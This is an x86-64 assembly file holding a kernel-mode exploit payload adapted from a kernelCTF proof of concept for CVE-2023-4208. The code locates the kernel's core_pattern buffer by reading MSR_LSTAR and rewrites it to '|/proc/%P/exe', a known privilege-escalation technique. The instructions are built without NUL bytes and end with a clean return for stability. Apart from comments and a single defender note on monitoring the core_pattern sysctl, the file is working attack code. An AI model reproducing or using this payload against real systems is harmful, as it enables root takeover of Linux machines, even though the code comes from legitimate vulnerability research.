# This payload is based on
# https://raw.githubusercontent.com/google/security-research/refs/heads/master/pocs/linux/kernelctf/CVE-2023-4208_lts_cos_mitigation/exploit/lts-6.1.36/sc.py

.intel_syntax noprefix

# Ring-0 payload, x86-64, GAS Intel syntax.  It locates the kernel's
# core_pattern buffer and stores the string "|/proc/%P/exe" into it, i.e. it
# names the crashing process's own executable as the core-dump pipe handler.
# The two absolute addresses below belong to the single kernel build the
# upstream PoC targets (lts-6.1.36 per the path in the header); the payload
# is not portable across builds and is meaningless outside kernel mode.
# Defender note: the lasting artefact is the kernel.core_pattern sysctl
# holding an unexpected value that begins with '|'; integrity monitoring of
# that sysctl detects this class of payload independently of the constants.
#
# Register use: rdx:rax  rdmsr result, then rdx = write pointer
#               rcx      MSR number, then shift count
#               rsi      4-byte chunks of the offset and of the string
# Clobbers: rax, rcx, rdx, rsi, flags.  No stack frame is set up.
# Every constant is built from 8-bit moves into the low register half,
# presumably so the encoding contains no NUL bytes (TODO confirm against
# the delivery path mentioned near the end of the file).

.set entry_SYSCALL_64, 0xffffffff82400040
.set core_pattern, 0xffffffff83bbace0

# do rdmsr(MSR_LSTAR) so EDX and EAX will contain address of entry_SYSCALL_64
# ECX should be MSR_LSTAR ( 0xc0000082 )
# rdmsr returns the 64-bit MSR value split as EDX:EAX (high:low).
xor ecx, ecx
xor edx, edx
mov cl, 0xc0
shl ecx, 24                        # ecx = 0xc0000000
mov cl, 0x82                       # ecx = 0xc0000082 (MSR_LSTAR)
rdmsr
# make rdx = entry_SYSCALL_64's address
# rdx = (edx << 32) | eax.  The 32-bit write to edx above already zeroed
# the upper half of rdx, so the shift brings in no stale bits.
xor ecx, ecx
mov cl, 32
shl rdx, cl
add rdx, rax
# Build the delta core_pattern - entry_SYSCALL_64 one byte at a time,
# most-significant byte first.  Only the distance between the two symbols
# is encoded as a constant; the base comes from the MSR read above.  The
# delta is assembled in esi, so it must fit in 32 bits (the 32-bit writes
# zero the upper half of rsi before the 64-bit add).
xor esi,esi
mov sil, (((core_pattern - entry_SYSCALL_64) >> 24) & 0xFF)
shl esi, 8
mov sil, (((core_pattern - entry_SYSCALL_64) >> 16) & 0xFF)
shl esi, 8
mov sil, (((core_pattern - entry_SYSCALL_64) >>  8) & 0xFF)
shl esi, 8
mov sil, (((core_pattern - entry_SYSCALL_64) >>  0) & 0xFF)
add rdx, rsi
# rdx = core_pattern

# prepare offset
# rax = 4: stride between the dword stores below.
xor eax, eax
mov al, 4

# write |/proc/%P/exe\0 into core_pattern
# Each group loads four characters into esi last-to-first, so the
# little-endian dword store lays them out in string order: loading
# 'r','p','/','|' yields the bytes "|/pr" at [rdx].
xor esi, esi
mov sil, 'r'
shl esi, 8
mov sil, 'p'
shl esi, 8
mov sil, '/'
shl esi, 8
mov sil, '|'
mov [rdx], esi                     # bytes 0..3   = "|/pr"
add rdx, rax

xor esi, esi
mov sil, '%'
shl esi, 8
mov sil, '/'
shl esi, 8
mov sil, 'c'
shl esi, 8
mov sil, 'o'
mov [rdx], esi                     # bytes 4..7   = "oc/%"
add rdx, rax

xor esi, esi
mov sil, 'x'
shl esi, 8
mov sil, 'e'
shl esi, 8
mov sil, '/'
shl esi, 8
mov sil, 'P'
mov [rdx], esi                     # bytes 8..11  = "P/ex"
add rdx, rax

xor esi, esi
mov sil, 'e'
mov [rdx], esi                     # bytes 12..15 = "e\0\0\0" (NUL-terminated)

# The original version used on remote would run an infinite loop here:
# jmp .
# That is sometimes a problem because it keeps this CPU from scheduling and
# can cause deadlocks, so for stability we return NULL instead, which works
# in our case (what the caller expects depends on the call site; 0 is what
# the upstream PoC relies on).
# Because our "nop-sled" pushed an invalid return address onto the stack,
# that word has to be discarded first.
pop rax                            # drop the bogus return address
xor eax, eax                       # return value 0 / NULL
ret
